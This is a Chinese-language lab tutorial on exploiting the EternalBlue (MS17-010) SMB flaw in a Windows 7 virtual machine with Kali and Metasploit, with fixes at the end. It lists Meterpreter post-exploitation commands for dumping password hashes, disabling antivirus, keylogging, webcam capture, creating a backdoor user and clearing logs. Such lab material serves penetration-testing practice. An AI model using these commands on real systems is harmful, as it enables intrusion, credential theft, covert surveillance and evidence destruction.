提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
前言
学安先学法,禁止恶意攻击。该文章仅做学术交流使用,禁止恶意转载使用,本人不承担任何后果。
一、测试环境准备
1.安装VMware
so easy不做描述
2.安装攻击机(kali镜像)
使用清华的镜像。
so easy不做过多描述
1.安装靶机(win7)
同上
二、测试前准备工作
1、打开VMware,开启虚拟机kali与windows7。
2、查看靶机的ip地址,win+R开启命令行输入cmd并回车。开启的窗口里输入ipconfig。查看ipv4地址,我这里是192.168.41.146。
3、关闭防火墙
4、打开kali,ping一下靶机地址,能ping通则表示防火墙成功关闭。Ctrl+c取消操作。
三、开始测试
第一步:使用kali自带的nmap工具扫描靶机ip,查看是否存在445端口,状态是否正常开启。
第二步:开启matesploit。
第三步:寻找有关于永恒之蓝(ms17-010)的模块。
第四步:使用第3个模块,检索目标靶机是否存在永恒之蓝漏洞。出现下图字样即代表存在。这里需要设置检索的地址,其他选项会自动默认设置。
第五步:使用第0个模块,攻击目标靶机。这里需要设置payload,攻击的ip地址rhost,其他选项会自动默认设置。详细命令可查看总结。输入run或exploit开始攻击。
显示以下字样即为攻击成功。
成功后会显示meterpreter命令提示符,这里可以开展进一步的渗透工作,详细命令可查看总结。
总结
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。在kali中,自带了Metasploit工具。
永恒之蓝通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
MSF后渗透命令:
切换到目标主机的windows shell:shell
从shell退出到meterpreter:exit
从meterpreter退出到MSF框架:background
查看获得的shell:sessions -l
切换到id为1的shell:sessions -i 1
进阶命令:
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\目录下
getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
run vnc #监控目标机桌面
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
clearev #清除日志
修复方法
(1)关闭445端口
1、win+r,打开regedit。
2、找到注册表项:
“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”
新建一个值,32位或64位看自己选择,我选择的是QWORD。
3、重命名该值为SMBDeviceEnabled。
4、右击修改该值,将数值数据改为0,点击确定,关闭窗口。
5、win+r,打开services.msc。
6、找到server服务,双击进入管理控制页面。把这个服务的启动类型更改为“禁用”,服务状态更改为“停止”,最后点击应用即可。
7、重启电脑生效。
验证:
1、打开kali,ping一下靶机地址,可以ping通。(关闭了防火墙)
2、nmap扫描,没有发现445端口。
3、msf未检查到永恒之蓝漏洞。
(2)开启防火墙
(3)安装对应补丁
官网补丁地址:
点击直达https://support.microsoft.com/zh-cn/topic/microsoft-%E5%AE%89%E5%85%A8%E5%85%AC%E5%91%8A-4025685-%E5%8F%97%E6%94%AF%E6%8C%81%E5%B9%B3%E5%8F%B0%E6%8C%87%E5%AF%BC2017-%E5%B9%B4-6-%E6%9C%88-13-%E6%97%A5-d35efef9-190b-31f6-d155-b323eb76779f
这里我一直安装失败,没找到解决方案,不详细描述了。
欢迎交流,不定时持续更新。